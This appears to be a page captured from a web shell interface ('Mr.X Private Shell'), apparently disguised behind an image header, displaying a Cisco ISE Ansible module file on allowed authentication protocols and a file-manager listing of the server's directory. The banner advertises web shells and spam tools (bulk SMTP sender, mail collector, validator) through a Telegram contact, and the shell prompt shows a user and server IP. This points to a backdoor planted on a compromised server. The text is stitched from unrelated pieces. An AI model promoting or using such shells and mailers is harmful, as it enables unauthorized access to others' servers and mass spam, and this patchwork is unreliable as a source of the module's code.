����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
# -*- coding: utf-8 -*-

# Copyright (c) 2021, Cisco Systems
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)

DOCUMENTATION = r"""
---
module: allowed_protocols
short_description: Resource module for Allowed Protocols
description:
- Manage operations create, update and delete of the resource Allowed Protocols.
- This API creates an allowed protocol.
- This API deletes an allowed protocol.
- This API allows the client to update an allowed protocol.
version_added: '1.0.0'
extends_documentation_fragment:
  - cisco.ise.module
author: Rafael Campos (@racampos)
options:
  allowChap:
    description: AllowChap flag.
    type: bool
  allowEapFast:
    description: AllowEapFast flag.
    type: bool
  allowEapMd5:
    description: AllowEapMd5 flag.
    type: bool
  allowEapTls:
    description: AllowEapTls flag.
    type: bool
  allowEapTtls:
    description: AllowEapTtls flag.
    type: bool
  allowLeap:
    description: AllowLeap flag.
    type: bool
  allowMsChapV1:
    description: AllowMsChapV1 flag.
    type: bool
  allowMsChapV2:
    description: AllowMsChapV2 flag.
    type: bool
  allowPapAscii:
    description: AllowPapAscii flag.
    type: bool
  allowPeap:
    description: AllowPeap flag.
    type: bool
  allowPreferredEapProtocol:
    description: AllowPreferredEapProtocol flag.
    type: bool
  allowTeap:
    description: AllowTeap flag.
    type: bool
  allowWeakCiphersForEap:
    description: AllowWeakCiphersForEap flag.
    type: bool
  description:
    description: Allowed Protocols's description.
    type: str
  eapFast:
    description: The eapFast is required only if allowEapFast is true, otherwise it
      must be ignored. The object eapFast contains the settings for EAP FAST protocol.
    suboptions:
      allowEapFastEapGtc:
        description: AllowEapFastEapGtc flag.
        type: bool
      allowEapFastEapGtcPwdChange:
        description: The allowEapFastEapGtcPwdChange is required only if allowEapFastEapGtc
          is true, otherwise it must be ignored.
        type: bool
      allowEapFastEapGtcPwdChangeRetries:
        description: The allowEapFastEapGtcPwdChangeRetries is required only if allowEapFastEapGtc
          is true, otherwise it must be ignored. Valid range is 0-3.
        type: int
      allowEapFastEapMsChapV2:
        description: AllowEapFastEapMsChapV2 flag.
        type: bool
      allowEapFastEapMsChapV2PwdChange:
        description: The allowEapFastEapMsChapV2PwdChange is required only if allowEapFastEapMsChapV2
          is true, otherwise it must be ignored.
        type: bool
      allowEapFastEapMsChapV2PwdChangeRetries:
        description: The allowEapFastEapMsChapV2PwdChangeRetries is required only if
          eapTtlsEapMsChapV2 is true, otherwise it must be ignored. Valid range is 0-3.
        type: int
      allowEapFastEapTls:
        description: AllowEapFastEapTls flag.
        type: bool
      allowEapFastEapTlsAuthOfExpiredCerts:
        description: The allowEapFastEapTlsAuthOfExpiredCerts is required only if allowEapFastEapTls
          is true, otherwise it must be ignored.
        type: bool
      eapFastDontUsePacsAcceptClientCert:
        description: The eapFastDontUsePacsAcceptClientCert is required only if eapFastUsePacs
          is FALSE, otherwise it must be ignored.
        type: bool
      eapFastDontUsePacsAllowMachineAuthentication:
        description: The eapFastDontUsePacsAllowMachineAuthentication is required only
          if eapFastUsePacs is FALSE, otherwise it must be ignored.
        type: bool
      eapFastEnableEAPChaining:
        description: EapFastEnableEAPChaining flag.
        type: bool
      eapFastUsePacs:
        description: EapFastUsePacs flag.
        type: bool
      eapFastUsePacsAcceptClientCert:
        description: The eapFastUsePacsAcceptClientCert is required only if eapFastUsePacsAllowAuthenProvisioning
          is true, otherwise it must be ignored.
        type: bool
      eapFastUsePacsAllowAnonymProvisioning:
        description: The eapFastUsePacsAllowAnonymProvisioning is required only if eapFastUsePacs
          is true, otherwise it must be ignored.
        type: bool
      eapFastUsePacsAllowAuthenProvisioning:
        description: The eapFastUsePacsAllowAuthenProvisioning is required only if eapFastUsePacs
          is true, otherwise it must be ignored.
        type: bool
      eapFastUsePacsAllowMachineAuthentication:
        description: EapFastUsePacsAllowMachineAuthentication flag.
        type: bool
      eapFastUsePacsAuthorizationPacTtl:
        description: The eapFastUsePacsAuthorizationPacTtl is required only if eapFastUsePacsStatelessSessionResume
          is true, otherwise it must be ignored.
        type: int
      eapFastUsePacsAuthorizationPacTtlUnits:
        description: The eapFastUsePacsAuthorizationPacTtlUnits is required only if
          eapFastUsePacsStatelessSessionResume is true, otherwise it must be ignored.
          Allowed Values - SECONDS, - MINUTES, - HOURS, - DAYS, - WEEKS.
        type: str
      eapFastUsePacsMachinePacTtl:
        description: The eapFastUsePacsMachinePacTtl is required only if eapFastUsePacsAllowMachineAuthentication
          is true, otherwise it must be ignored.
        type: int
      eapFastUsePacsMachinePacTtlUnits:
        description: The eapFastUsePacsMachinePacTtlUnits is required only if eapFastUsePacsAllowMachineAuthentication
          is true, otherwise it must be ignored. Allowed Values - SECONDS, - MINUTES,
          - HOURS, - DAYS, - WEEKS.
        type: str
      eapFastUsePacsReturnAccessAcceptAfterAuthenticatedProvisioning:
        description: The eapFastUsePacsReturnAccessAcceptAfterAuthenticatedProvisioning
          is required only if eapFastUsePacsAllowAuthenProvisioning is true, otherwise
          it must be ignored.
        type: bool
      eapFastUsePacsStatelessSessionResume:
        description: The eapFastUsePacsStatelessSessionResume is required only if eapFastUsePacs
          is true, otherwise it must be ignored.
        type: bool
      eapFastUsePacsTunnelPacTtl:
        description: The eapFastUsePacsTunnelPacTtl is required only if eapFastUsePacs
          is true, otherwise it must be ignored.
        type: int
      eapFastUsePacsTunnelPacTtlUnits:
        description: The eapFastUsePacsTunnelPacTtlUnits is required only if eapFastUsePacs
          is true, otherwise it must be ignored. Allowed Values - SECONDS, - MINUTES,
          - HOURS, - DAYS, - WEEKS.
        type: str
      eapFastUsePacsUseProactivePacUpdatePrecentage:
        description: The eapFastUsePacsUseProactivePacUpdatePrecentage is required only
          if eapFastUsePacs is true, otherwise it must be ignored.
        type: int
    type: dict
  eapTls:
    description: The eapTls is required only if allowEapTls is true, otherwise it must
      be ignored. The object eapTls contains the settings for EAP TLS protocol.
    suboptions:
      allowEapTlsAuthOfExpiredCerts:
        description: AllowEapTlsAuthOfExpiredCerts flag.
        type: bool
      eapTlsEnableStatelessSessionResume:
        description: EapTlsEnableStatelessSessionResume flag.
        type: bool
      eapTlsSessionTicketPrecentage:
        description: The eapTlsSessionTicketPrecentage is required only if eapTlsEnableStatelessSessionResume
          is true, otherwise it must be ignored.
        type: int
      eapTlsSessionTicketTtl:
        description: Time to live. The eapTlsSessionTicketTtl is required only if eapTlsEnableStatelessSessionResume
          is true, otherwise it must be ignored.
        type: int
      eapTlsSessionTicketTtlUnits:
        description: Time to live time units. The eapTlsSessionTicketTtlUnits is required
          only if eapTlsEnableStatelessSessionResume is true, otherwise it must be ignored.
          Allowed Values - SECONDS, - MINUTES, - HOURS, - DAYS, - WEEKS.
        type: str
    type: dict
  eapTlsLBit:
    description: EapTlsLBit flag.
    type: bool
  eapTtls:
    description: The eapTtls is required only if allowEapTtls is true, otherwise it
      must be ignored. The object eapTtls contains the settings for EAP TTLS protocol.
    suboptions:
      eapTtlsChap:
        description: EapTtlsChap flag.
        type: bool
      eapTtlsEapMd5:
        description: EapTtlsEapMd5 flag.
        type: bool
      eapTtlsEapMsChapV2:
        description: EapTtlsEapMsChapV2 flag.
        type: bool
      eapTtlsEapMsChapV2PwdChange:
        description: The eapTtlsEapMsChapV2PwdChange is required only if eapTtlsEapMsChapV2
          is true, otherwise it must be ignored.
        type: bool
      eapTtlsEapMsChapV2PwdChangeRetries:
        description: The eapTtlsEapMsChapV2PwdChangeRetries is required only if eapTtlsEapMsChapV2
          is true, otherwise it must be ignored. Valid range is 0-3.
        type: int
      eapTtlsMsChapV1:
        description: EapTtlsMsChapV1 flag.
        type: bool
      eapTtlsMsChapV2:
        description: EapTtlsMsChapV2 flag.
        type: bool
      eapTtlsPapAscii:
        description: EapTtlsPapAscii flag.
        type: bool
    type: dict
  id:
    description: Resource UUID, Mandatory for update.
    type: str
  name:
    description: Resource Name.
    type: str
  peap:
    description: Allowed Protocols's peap.
    suboptions:
      allowPeapEapGtc:
        description: AllowPeapEapGtc flag.
        type: bool
      allowPeapEapGtcPwdChange:
        description: The allowPeapEapGtcPwdChange is required only if allowPeapEapGtc
          is true, otherwise it must be ignored.
        type: bool
      allowPeapEapGtcPwdChangeRetries:
        description: The allowPeapEapGtcPwdChangeRetries is required only if allowPeapEapGtc
          is true, otherwise it must be ignored. Valid range is 0-3.
        type: int
      allowPeapEapMsChapV2:
        description: AllowPeapEapMsChapV2 flag.
        type: bool
      allowPeapEapMsChapV2PwdChange:
        description: The allowPeapEapMsChapV2PwdChange is required only if allowPeapEapMsChapV2
          is true, otherwise it must be ignored.
        type: bool
      allowPeapEapMsChapV2PwdChangeRetries:
        description: The allowPeapEapMsChapV2PwdChangeRetries is required only if allowPeapEapMsChapV2
          is true, otherwise it must be ignored. Valid range is 0-3.
        type: int
      allowPeapEapTls:
        description: AllowPeapEapTls flag.
        type: bool
      allowPeapEapTlsAuthOfExpiredCerts:
        description: The allowPeapEapTlsAuthOfExpiredCerts is required only if allowPeapEapTls
          is true, otherwise it must be ignored.
        type: bool
      allowPeapV0:
        description: AllowPeapV0 flag.
        type: bool
      requireCryptobinding:
        description: RequireCryptobinding flag.
        type: bool
    type: dict
  preferredEapProtocol:
    description: The preferredEapProtocol is required only if allowPreferredEapProtocol
      is true, otherwise it must be ignored. Allowed Values - EAP_FAST, - PEAP, - LEAP,
      - EAP_MD5, - EAP_TLS, - EAP_TTLS, - TEAP.
    type: str
  processHostLookup:
    description: ProcessHostLookup flag.
    type: bool
  requireMessageAuth:
    description: RequireMessageAuth flag.
    type: bool
  teap:
    description: The teap is required only if allowTeap is true, otherwise it must be
      ignored. The object teap contains the settings for TEAP protocol.
    suboptions:
      acceptClientCertDuringTunnelEst:
        description: AcceptClientCertDuringTunnelEst flag.
        type: bool
      allowDowngradeMsk:
        description: AllowDowngradeMsk flag.
        type: bool
      allowTeapEapMsChapV2:
        description: AllowTeapEapMsChapV2 flag.
        type: bool
      allowTeapEapMsChapV2PwdChange:
        description: The allowTeapEapMsChapV2PwdChange is required only if allowTeapEapMsChapV2
          is true, otherwise it must be ignored.
        type: bool
      allowTeapEapMsChapV2PwdChangeRetries:
        description: The allowTeapEapMsChapV2PwdChangeRetries is required only if allowTeapEapMsChapV2
          is true, otherwise it must be ignored. Valid range is 0-3.
        type: int
      allowTeapEapTls:
        description: AllowTeapEapTls flag.
        type: bool
      allowTeapEapTlsAuthOfExpiredCerts:
        description: The allowTeapEapTlsAuthOfExpiredCerts is required only if allowTeapEapTls
          is true, otherwise it must be ignored.
        type: bool
      enableEapChaining:
        description: EnableEapChaining flag.
        type: bool
    type: dict
requirements:
- ciscoisesdk >= 2.0.8
- python >= 3.5
notes:
  - SDK Method used are
    allowed_protocols.AllowedProtocols.create_allowed_protocol,
    allowed_protocols.AllowedProtocols.delete_allowed_protocol_by_id,
    allowed_protocols.AllowedProtocols.update_allowed_protocol_by_id,

  - Paths used are
    post /ers/config/allowedprotocols,
    delete /ers/config/allowedprotocols/{id},
    put /ers/config/allowedprotocols/{id},

"""

EXAMPLES = r"""
- name: Update by id
  cisco.ise.allowed_protocols:
    ise_hostname: "{{ise_hostname}}"
    ise_username: "{{ise_username}}"
    ise_password: "{{ise_password}}"
    ise_verify: "{{ise_verify}}"
    state: present
    allowChap: true
    allowEapFast: true
    allowEapMd5: true
    allowEapTls: true
    allowEapTtls: true
    allowLeap: true
    allowMsChapV1: true
    allowMsChapV2: true
    allowPapAscii: true
    allowPeap: true
    allowPreferredEapProtocol: true
    allowTeap: true
    allowWeakCiphersForEap: true
    description: string
    eapFast:
      allowEapFastEapGtc: true
      allowEapFastEapGtcPwdChange: true
      allowEapFastEapGtcPwdChangeRetries: 0
      allowEapFastEapMsChapV2: true
      allowEapFastEapMsChapV2PwdChange: true
      allowEapFastEapMsChapV2PwdChangeRetries: 0
      allowEapFastEapTls: true
      allowEapFastEapTlsAuthOfExpiredCerts: true
      eapFastDontUsePacsAcceptClientCert: true
      eapFastDontUsePacsAllowMachineAuthentication: true
      eapFastEnableEAPChaining: true
      eapFastUsePacs: true
      eapFastUsePacsAcceptClientCert: true
      eapFastUsePacsAllowAnonymProvisioning: true
      eapFastUsePacsAllowAuthenProvisioning: true
      eapFastUsePacsAllowMachineAuthentication: true
      eapFastUsePacsAuthorizationPacTtl: 0
      eapFastUsePacsAuthorizationPacTtlUnits: string
      eapFastUsePacsMachinePacTtl: 0
      eapFastUsePacsMachinePacTtlUnits: string
      eapFastUsePacsReturnAccessAcceptAfterAuthenticatedProvisioning: true
      eapFastUsePacsStatelessSessionResume: true
      eapFastUsePacsTunnelPacTtl: 0
      eapFastUsePacsTunnelPacTtlUnits: string
      eapFastUsePacsUseProactivePacUpdatePrecentage: 0
    eapTls:
      allowEapTlsAuthOfExpiredCerts: true
      eapTlsEnableStatelessSessionResume: true
      eapTlsSessionTicketPrecentage: 0
      eapTlsSessionTicketTtl: 0
      eapTlsSessionTicketTtlUnits: string
    eapTlsLBit: true
    eapTtls:
      eapTtlsChap: true
      eapTtlsEapMd5: true
      eapTtlsEapMsChapV2: true
      eapTtlsEapMsChapV2PwdChange: true
      eapTtlsEapMsChapV2PwdChangeRetries: 0
      eapTtlsMsChapV1: true
      eapTtlsMsChapV2: true
      eapTtlsPapAscii: true
    id: string
    name: string
    peap:
      allowPeapEapGtc: true
      allowPeapEapGtcPwdChange: true
      allowPeapEapGtcPwdChangeRetries: 0
      allowPeapEapMsChapV2: true
      allowPeapEapMsChapV2PwdChange: true
      allowPeapEapMsChapV2PwdChangeRetries: 0
      allowPeapEapTls: true
      allowPeapEapTlsAuthOfExpiredCerts: true
      allowPeapV0: true
      requireCryptobinding: true
    preferredEapProtocol: string
    processHostLookup: true
    requireMessageAuth: true
    teap:
      acceptClientCertDuringTunnelEst: true
      allowDowngradeMsk: true
      allowTeapEapMsChapV2: true
      allowTeapEapMsChapV2PwdChange: true
      allowTeapEapMsChapV2PwdChangeRetries: 0
      allowTeapEapTls: true
      allowTeapEapTlsAuthOfExpiredCerts: true
      enableEapChaining: true

- name: Delete by id
  cisco.ise.allowed_protocols:
    ise_hostname: "{{ise_hostname}}"
    ise_username: "{{ise_username}}"
    ise_password: "{{ise_password}}"
    ise_verify: "{{ise_verify}}"
    state: absent
    id: string

- name: Create
  cisco.ise.allowed_protocols:
    ise_hostname: "{{ise_hostname}}"
    ise_username: "{{ise_username}}"
    ise_password: "{{ise_password}}"
    ise_verify: "{{ise_verify}}"
    state: present
    allowChap: true
    allowEapFast: true
    allowEapMd5: true
    allowEapTls: true
    allowEapTtls: true
    allowLeap: true
    allowMsChapV1: true
    allowMsChapV2: true
    allowPapAscii: true
    allowPeap: true
    allowPreferredEapProtocol: true
    allowTeap: true
    allowWeakCiphersForEap: true
    description: string
    eapFast:
      allowEapFastEapGtc: true
      allowEapFastEapGtcPwdChange: true
      allowEapFastEapGtcPwdChangeRetries: 0
      allowEapFastEapMsChapV2: true
      allowEapFastEapMsChapV2PwdChange: true
      allowEapFastEapMsChapV2PwdChangeRetries: 0
      allowEapFastEapTls: true
      allowEapFastEapTlsAuthOfExpiredCerts: true
      eapFastDontUsePacsAcceptClientCert: true
      eapFastDontUsePacsAllowMachineAuthentication: true
      eapFastEnableEAPChaining: true
      eapFastUsePacs: true
      eapFastUsePacsAcceptClientCert: true
      eapFastUsePacsAllowAnonymProvisioning: true
      eapFastUsePacsAllowAuthenProvisioning: true
      eapFastUsePacsAllowMachineAuthentication: true
      eapFastUsePacsAuthorizationPacTtl: 0
      eapFastUsePacsAuthorizationPacTtlUnits: string
      eapFastUsePacsMachinePacTtl: 0
      eapFastUsePacsMachinePacTtlUnits: string
      eapFastUsePacsReturnAccessAcceptAfterAuthenticatedProvisioning: true
      eapFastUsePacsStatelessSessionResume: true
      eapFastUsePacsTunnelPacTtl: 0
      eapFastUsePacsTunnelPacTtlUnits: string
      eapFastUsePacsUseProactivePacUpdatePrecentage: 0
    eapTls:
      allowEapTlsAuthOfExpiredCerts: true
      eapTlsEnableStatelessSessionResume: true
      eapTlsSessionTicketPrecentage: 0
      eapTlsSessionTicketTtl: 0
      eapTlsSessionTicketTtlUnits: string
    eapTlsLBit: true
    eapTtls:
      eapTtlsChap: true
      eapTtlsEapMd5: true
      eapTtlsEapMsChapV2: true
      eapTtlsEapMsChapV2PwdChange: true
      eapTtlsEapMsChapV2PwdChangeRetries: 0
      eapTtlsMsChapV1: true
      eapTtlsMsChapV2: true
      eapTtlsPapAscii: true
    name: string
    peap:
      allowPeapEapGtc: true
      allowPeapEapGtcPwdChange: true
      allowPeapEapGtcPwdChangeRetries: 0
      allowPeapEapMsChapV2: true
      allowPeapEapMsChapV2PwdChange: true
      allowPeapEapMsChapV2PwdChangeRetries: 0
      allowPeapEapTls: true
      allowPeapEapTlsAuthOfExpiredCerts: true
      allowPeapV0: true
      requireCryptobinding: true
    preferredEapProtocol: string
    processHostLookup: true
    requireMessageAuth: true
    teap:
      acceptClientCertDuringTunnelEst: true
      allowDowngradeMsk: true
      allowTeapEapMsChapV2: true
      allowTeapEapMsChapV2PwdChange: true
      allowTeapEapMsChapV2PwdChangeRetries: 0
      allowTeapEapTls: true
      allowTeapEapTlsAuthOfExpiredCerts: true
      enableEapChaining: true

"""

RETURN = r"""
ise_response:
  description: A dictionary or list with the response returned by the Cisco ISE Python SDK
  returned: always
  type: dict
  sample: >
    {
      "id": "string",
      "name": "string",
      "description": "string",
      "eapTls": {
        "allowEapTlsAuthOfExpiredCerts": true,
        "eapTlsEnableStatelessSessionResume": true,
        "eapTlsSessionTicketTtl": 0,
        "eapTlsSessionTicketTtlUnits": "string",
        "eapTlsSessionTicketPrecentage": 0
      },
      "peap": {
        "allowPeapEapMsChapV2": true,
        "allowPeapEapMsChapV2PwdChange": true,
        "allowPeapEapMsChapV2PwdChangeRetries": 0,
        "allowPeapEapGtc": true,
        "allowPeapEapGtcPwdChange": true,
        "allowPeapEapGtcPwdChangeRetries": 0,
        "allowPeapEapTls": true,
        "allowPeapEapTlsAuthOfExpiredCerts": true,
        "requireCryptobinding": true,
        "allowPeapV0": true
      },
      "eapFast": {
        "allowEapFastEapMsChapV2": true,
        "allowEapFastEapMsChapV2PwdChange": true,
        "allowEapFastEapMsChapV2PwdChangeRetries": 0,
        "allowEapFastEapGtc": true,
        "allowEapFastEapGtcPwdChange": true,
        "allowEapFastEapGtcPwdChangeRetries": 0,
        "allowEapFastEapTls": true,
        "allowEapFastEapTlsAuthOfExpiredCerts": true,
        "eapFastUsePacs": true,
        "eapFastUsePacsTunnelPacTtl": 0,
        "eapFastUsePacsTunnelPacTtlUnits": "string",
        "eapFastUsePacsUseProactivePacUpdatePrecentage": 0,
        "eapFastUsePacsAllowAnonymProvisioning": true,
        "eapFastUsePacsAllowAuthenProvisioning": true,
        "eapFastUsePacsReturnAccessAcceptAfterAuthenticatedProvisioning": true,
        "eapFastUsePacsAcceptClientCert": true,
        "eapFastUsePacsMachinePacTtl": 0,
        "eapFastUsePacsMachinePacTtlUnits": "string",
        "eapFastUsePacsAllowMachineAuthentication": true,
        "eapFastUsePacsStatelessSessionResume": true,
        "eapFastUsePacsAuthorizationPacTtl": 0,
        "eapFastUsePacsAuthorizationPacTtlUnits": "string",
        "eapFastDontUsePacsAcceptClientCert": true,
        "eapFastDontUsePacsAllowMachineAuthentication": true,
        "eapFastEnableEAPChaining": true
      },
      "eapTtls": {
        "eapTtlsPapAscii": true,
        "eapTtlsChap": true,
        "eapTtlsMsChapV1": true,
        "eapTtlsMsChapV2": true,
        "eapTtlsEapMd5": true,
        "eapTtlsEapMsChapV2": true,
        "eapTtlsEapMsChapV2PwdChange": true,
        "eapTtlsEapMsChapV2PwdChangeRetries": 0
      },
      "teap": {
        "allowTeapEapMsChapV2": true,
        "allowTeapEapMsChapV2PwdChange": true,
        "allowTeapEapMsChapV2PwdChangeRetries": 0,
        "allowTeapEapTls": true,
        "allowTeapEapTlsAuthOfExpiredCerts": true,
        "acceptClientCertDuringTunnelEst": true,
        "enableEapChaining": true,
        "allowDowngradeMsk": true
      },
      "processHostLookup": true,
      "allowPapAscii": true,
      "allowChap": true,
      "allowMsChapV1": true,
      "allowMsChapV2": true,
      "allowEapMd5": true,
      "allowLeap": true,
      "allowEapTls": true,
      "allowEapTtls": true,
      "allowEapFast": true,
      "allowPeap": true,
      "allowTeap": true,
      "allowPreferredEapProtocol": true,
      "preferredEapProtocol": "string",
      "eapTlsLBit": true,
      "allowWeakCiphersForEap": true,
      "requireMessageAuth": true,
      "link": {
        "rel": "string",
        "href": "string",
        "type": "string"
      }
    }

ise_update_response:
  description: A dictionary or list with the response returned by the Cisco ISE Python SDK
  returned: always
  version_added: '1.1.0'
  type: dict
  sample: >
    {
      "UpdatedFieldsList": {
        "updatedField": [
          {
            "field": "string",
            "oldValue": "string",
            "newValue": "string"
          }
        ],
        "field": "string",
        "oldValue": "string",
        "newValue": "string"
      }
    }
"""

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 0 B 0644
aci_bindings_info.py File 2.46 KB 0644
aci_settings.py File 4.54 KB 0644
aci_settings_info.py File 1.77 KB 0644
aci_test_connectivity.py File 1.19 KB 0644
active_directory.py File 10.81 KB 0644
active_directory_add_groups.py File 8.75 KB 0644
active_directory_groups_by_domain_info.py File 2.21 KB 0644
active_directory_info.py File 6.2 KB 0644
active_directory_is_user_member_of_group_info.py File 2.04 KB 0644
active_directory_join_domain.py File 1.97 KB 0644
active_directory_join_domain_with_all_nodes.py File 1.79 KB 0644
active_directory_leave_domain.py File 1.98 KB 0644
active_directory_leave_domain_with_all_nodes.py File 1.81 KB 0644
active_directory_trusted_domains_info.py File 1.44 KB 0644
active_directory_user_groups_info.py File 1.82 KB 0644
admin_user_info.py File 4.31 KB 0644
allowed_protocols.py File 22.7 KB 0644
allowed_protocols_info.py File 9.28 KB 0644
anc_endpoint_apply.py File 1.52 KB 0644
anc_endpoint_bulk_monitor_status_info.py File 1.69 KB 0644
anc_endpoint_bulk_request.py File 1.36 KB 0644
anc_endpoint_clear.py File 1.47 KB 0644
anc_endpoint_info.py File 3.84 KB 0644
anc_policy.py File 2.99 KB 0644
anc_policy_bulk_monitor_status_info.py File 1.68 KB 0644
anc_policy_bulk_request.py File 1.34 KB 0644
anc_policy_info.py File 4.3 KB 0644
authorization_profile.py File 11.26 KB 0644
authorization_profile_info.py File 6.12 KB 0644
backup_cancel.py File 1.76 KB 0644
backup_config.py File 2.33 KB 0644
backup_last_status_info.py File 1.73 KB 0644
backup_restore.py File 2.2 KB 0644
backup_schedule_config.py File 3.36 KB 0644
backup_schedule_config_update.py File 3.41 KB 0644
bind_signed_certificate.py File 3.27 KB 0644
byod_portal.py File 17.23 KB 0644
byod_portal_info.py File 8.73 KB 0644
certificate_profile.py File 4.08 KB 0644
certificate_profile_info.py File 3.36 KB 0644
certificate_template_info.py File 2.97 KB 0644
csr_delete.py File 1.68 KB 0644
csr_export_info.py File 2 KB 0644
csr_generate.py File 3.34 KB 0644
csr_generate_intermediate_ca.py File 1.57 KB 0644
csr_info.py File 4.71 KB 0644
deployment_info.py File 4.45 KB 0644
device_administration_authentication_reset_hitcount.py File 1.72 KB 0644
device_administration_authentication_rules.py File 17.12 KB 0644
device_administration_authentication_rules_info.py File 4.04 KB 0644
device_administration_authorization_reset_hitcount.py File 1.71 KB 0644
device_administration_authorization_rules.py File 16.69 KB 0644
device_administration_authorization_rules_info.py File 3.97 KB 0644
device_administration_command_set_info.py File 1.54 KB 0644
device_administration_conditions.py File 13.11 KB 0644
device_administration_conditions_for_authentication_rule_info.py File 2.85 KB 0644
device_administration_conditions_for_authorization_rule_info.py File 2.84 KB 0644
device_administration_conditions_for_policy_set_info.py File 2.78 KB 0644
device_administration_conditions_info.py File 3.72 KB 0644
device_administration_dictionary_attributes_authentication_info.py File 2.09 KB 0644
device_administration_dictionary_attributes_authorization_info.py File 2.08 KB 0644
device_administration_dictionary_attributes_policy_set_info.py File 2.06 KB 0644
device_administration_global_exception_rules.py File 16.82 KB 0644
device_administration_global_exception_rules_info.py File 3.98 KB 0644
device_administration_global_exception_rules_reset_hitcount.py File 1.7 KB 0644
device_administration_identity_stores_info.py File 1.6 KB 0644
device_administration_local_exception_rules.py File 16.83 KB 0644
device_administration_local_exception_rules_info.py File 4.04 KB 0644
device_administration_local_exception_rules_reset_hitcount.py File 1.77 KB 0644
device_administration_network_conditions.py File 8.51 KB 0644
device_administration_network_conditions_info.py File 2.96 KB 0644
device_administration_policy_set.py File 14.95 KB 0644
device_administration_policy_set_info.py File 3.53 KB 0644
device_administration_policy_set_reset_hitcount.py File 1.52 KB 0644
device_administration_profiles_info.py File 1.52 KB 0644
device_administration_service_names_info.py File 1.66 KB 0644
device_administration_time_date_conditions.py File 9.49 KB 0644
device_administration_time_date_conditions_info.py File 2.18 KB 0644
downloadable_acl.py File 3.96 KB 0644
downloadable_acl_info.py File 2.5 KB 0644
egress_matrix_cell.py File 3.7 KB 0644
egress_matrix_cell_bulk_monitor_status_info.py File 1.77 KB 0644
egress_matrix_cell_bulk_request.py File 1.42 KB 0644
egress_matrix_cell_clear_all.py File 1.16 KB 0644
egress_matrix_cell_clone.py File 1.57 KB 0644
egress_matrix_cell_info.py File 4.29 KB 0644
egress_matrix_cell_set_all_status.py File 1.27 KB 0644
endpoint.py File 6.33 KB 0644
endpoint_bulk_monitor_status_info.py File 1.69 KB 0644
endpoint_bulk_request.py File 1.33 KB 0644
endpoint_certificate.py File 2.8 KB 0644
endpoint_deregister.py File 1.15 KB 0644
endpoint_get_rejected_endpoints_info.py File 1.29 KB 0644
endpoint_group.py File 3.17 KB 0644
endpoint_group_info.py File 4.72 KB 0644
endpoint_info.py File 5.76 KB 0644
endpoint_register.py File 3.88 KB 0644
endpoint_release_rejected_endpoint.py File 1.23 KB 0644
external_radius_server.py File 5.18 KB 0644
external_radius_server_info.py File 3.7 KB 0644
filter_policy.py File 3 KB 0644
filter_policy_info.py File 2.18 KB 0644
guest_location_info.py File 3.8 KB 0644
guest_smtp_notification_settings.py File 4.38 KB 0644
guest_smtp_notification_settings_info.py File 4.75 KB 0644
guest_ssid.py File 2.58 KB 0644
guest_ssid_info.py File 3.73 KB 0644
guest_type.py File 8.13 KB 0644
guest_type_email.py File 1.49 KB 0644
guest_type_info.py File 5.89 KB 0644
guest_type_sms.py File 1.53 KB 0644
guest_user.py File 8.32 KB 0644
guest_user_approve.py File 1.16 KB 0644
guest_user_bulk_monitor_status_info.py File 1.7 KB 0644
guest_user_bulk_request.py File 1.34 KB 0644
guest_user_change_sponsor_password.py File 1.69 KB 0644
guest_user_deny.py File 1.14 KB 0644
guest_user_email.py File 1.6 KB 0644
guest_user_info.py File 5.95 KB 0644
guest_user_reinstate.py File 1.61 KB 0644
guest_user_reset_password.py File 1.36 KB 0644
guest_user_sms.py File 1.25 KB 0644
guest_user_suspend.py File 1.92 KB 0644
hotpatch_info.py File 1.34 KB 0644
hotpatch_install.py File 1.81 KB 0644
hotpatch_rollback.py File 1.8 KB 0644
hotspot_portal.py File 16.66 KB 0644
hotspot_portal_info.py File 8.56 KB 0644
id_store_sequence.py File 4.02 KB 0644
id_store_sequence_info.py File 3.58 KB 0644
identity_group.py File 2.7 KB 0644
identity_group_info.py File 4.63 KB 0644
internal_user.py File 5.82 KB 0644
internal_user_info.py File 5.06 KB 0644
ise_root_ca_regenerate.py File 1.73 KB 0644
licensing_connection_type_info.py File 1.36 KB 0644
licensing_eval_license_info.py File 1.32 KB 0644
licensing_feature_to_tier_mapping_info.py File 1.48 KB 0644
licensing_registration_create.py File 1.95 KB 0644
licensing_registration_info.py File 1.44 KB 0644
licensing_smart_state_create.py File 1.31 KB 0644
licensing_smart_state_info.py File 1.35 KB 0644
licensing_tier_state_create.py File 1.82 KB 0644
licensing_tier_state_info.py File 1.51 KB 0644
mnt_account_status_info.py File 1.22 KB 0644
mnt_athentication_status_info.py File 1.43 KB 0644
mnt_authentication_status_info.py File 1.36 KB 0644
mnt_failure_reasons_info.py File 1.02 KB 0644
mnt_session_active_count_info.py File 1.07 KB 0644
mnt_session_active_list_info.py File 1.08 KB 0644
mnt_session_auth_list_info.py File 1.08 KB 0644
mnt_session_by_ip_info.py File 1.16 KB 0644
mnt_session_by_mac_info.py File 1.11 KB 0644
mnt_session_by_nas_ip_info.py File 1.14 KB 0644
mnt_session_by_username_info.py File 1.16 KB 0644
mnt_session_delete_all.py File 1.02 KB 0644
mnt_session_disconnect_info.py File 1.58 KB 0644
mnt_session_posture_count_info.py File 1.08 KB 0644
mnt_session_profiler_count_info.py File 1.09 KB 0644
mnt_session_reauthentication_info.py File 1.42 KB 0644
mnt_sessions_by_session_id_info.py File 1.19 KB 0644
mnt_version_info.py File 1.05 KB 0644
my_device_portal.py File 18.56 KB 0644
my_device_portal_info.py File 9.2 KB 0644
native_supplicant_profile.py File 3.88 KB 0644
native_supplicant_profile_info.py File 3.22 KB 0644
